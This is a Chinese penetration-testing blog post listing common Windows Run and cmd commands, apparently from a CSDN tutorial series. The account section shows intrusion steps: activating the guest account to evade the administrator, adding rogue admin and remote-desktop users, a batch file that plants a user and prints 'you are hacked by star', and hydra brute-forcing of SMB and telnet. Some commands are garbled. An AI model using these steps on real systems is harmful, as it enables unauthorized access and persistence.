渗透篇09-Windows常用命令详解

版权声明:本文属于Shavchen的原创文章,未经允许,禁止转载! https://blog.csdn.net/qq_38055050/article/details/79968052

一、  运行窗口--常用命令

gpedit.msc:                 打开本地组策略
eventvwr.msc                事件查看器
lusrmgr.msc                  本地用户、组管理
regedit:                          打开注册表
secpol.msc                    本地安全设置
chkdsk.exe                    磁盘检查
cleanmgr                       垃圾整理
iexpress                        木马捆绑工具,系统自带
taskmgr                        任务管理器
mstsc               ---------远程桌面连接
eventvwr            -------事件查看器
explorer              -------打开资源管理器
rononce -p             ----15秒关机
Clipbrd              --------剪贴板查看器
regsvr32 /u *.dll      ----停止dll文件运行
charmap                -----启动字符映射表
regsvr32 /u zipfldr.dll------取消ZIP支持
mmc:                                打开控制台
devmgmt.msc                -- 设备管理器
dcomcnfg                -------打开系统组件服务
dfrg.msc                    ------磁盘碎片整理程序
notepad                  --------打开记事本
Nslookup                     IP地址侦测器
control admintools             管理工具
services.msc:                       打开服务
ncpa.cpl:                              打开本地网络
control:                             打开控制面板
compmgmt.msc:               打开计算机管理
moconfig :                         打开启动项
sysdm.cpl :                         打开系统属性
\\ip:                                       访问共享
calc:                                    计算器
mspaint:                             画图
二、Dos窗口--常用命令:

0x01、系统进程类

                color                                 改变颜色(通过加?可查看关于color所有命令)

                msg 系统用户名 "内容"     弹出系统弹窗
systeminfo                       查看系统信息
shutdown -s -t 180 -c "内容"    定时关机

-a              注销指令

                net start                                             查看开启的服务

net stop 服务名                                  停止服务

                tasklist                              查看系统进程

taskkill option 进程           结束进程

                         

netsh wlan set hostednetwor k mode-allow ssid=cc key=123456         搭建无线网络
at                                                                                                   查看计划任务
     时间 命令    执行计划任务
    22:00 shutdown -s -t 180 every:date  
   /delete      停止所有计划任务

   id /delete   

                            


0x02、网络进程类

                ping -t -l 数据包大小 ip     死亡之ping

                        


tracert ip                          能够显示访问网络经过的路由。

tracert ip                          能够显示访问网络经过的路由。

getmac                          获得本地网卡的mac地址。

                ipconfig /all 查看详细ip
  /release  释放ip(清空ip)
  /renew   重新获取ip

route print                       查看路由表 

                arp -a                               显示局域网下同一网段的ip地址

net view                           查看局域网内其他主机的主机名

                telnet ip                                             远程连接目标主机
net use k: \\ip\c$                               把目标主机的C盘映射为本地的k盘

    /del 注销之

                netstat -an                         查看开启的端口和网络连接情况
    -o                          已连接的端口
    -v                          查看正在进行的工作

0x03、文件操作类

                dir                                             查看目录
cd \                                           切换到根目录
        具体路径

d:——c:盘符间切换

                         

md 目录名                                创建目录
rd 目录名                                  删除目录
copy con c:\123.txt                  创建123.txt到c盘根目录
  #输入内容、ctrl+z回车
type 文件名                               打开文件
start 文件名                               打开文件

del 文件名                                 删除文件

                copy 文件名 目标路径
move 文件名 目标路径

tree                                                    树形列出文件夹结构

                attrib 文件名(目录名)  查看某文件(目录)的属性
 -A -R -S -H   去掉某文档的存档,只读。系统,隐藏属性

 +A +R +S +H   添加某文档的存档,只读。系统,隐藏属性 

                

0x04、账户类         

runas /user:administrator "cmd /k" 或

                runas /noprofile /user:mymachine\administrator cmd        以管理员权限运行dos窗口

                            

net user                                             查看有哪些用户
用户名 密码 /add 建立用户
guest /active:yes 激活guest用户(一般使用此用户避免让管理员察觉)
net locaLGroup 查看本地有哪些组
   administrators 用户名 /add             将用户添加到管理员组
   "remote desktop users" 123 /add   将用户添加到远程桌面组
net user guest 12345                                                  用guest用户登陆后将密码改为12345
net user 用户 密码                                                       更改用户登录密码
net share                                                                     查看本地开启的共享
 ipc$                                                            开启ipc$共享
 /del                                                             删除ipc$共享
 c$ /del                                                         删称C:共享
    简单测试——hydra爆破管理员登陆密码:具体参数详见http://blog.csdn.net/scottly1/article/details/25562945
   破解smb:                                                                                                                                                                               hydra.exe -l administrator -P pass.txt 192.168.120.128 smb
    copy con c:\123.bat 
    net user star 123 /add
    net user localgroup administrators star /add——或ad(简单绕过一些防护)
    shutdown -t 180 -c "you are hacked by star"
    ^z

   破解telnet:hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V


阅读更多
想对作者说点什么?

博主推荐

换一批

没有更多推荐了,返回首页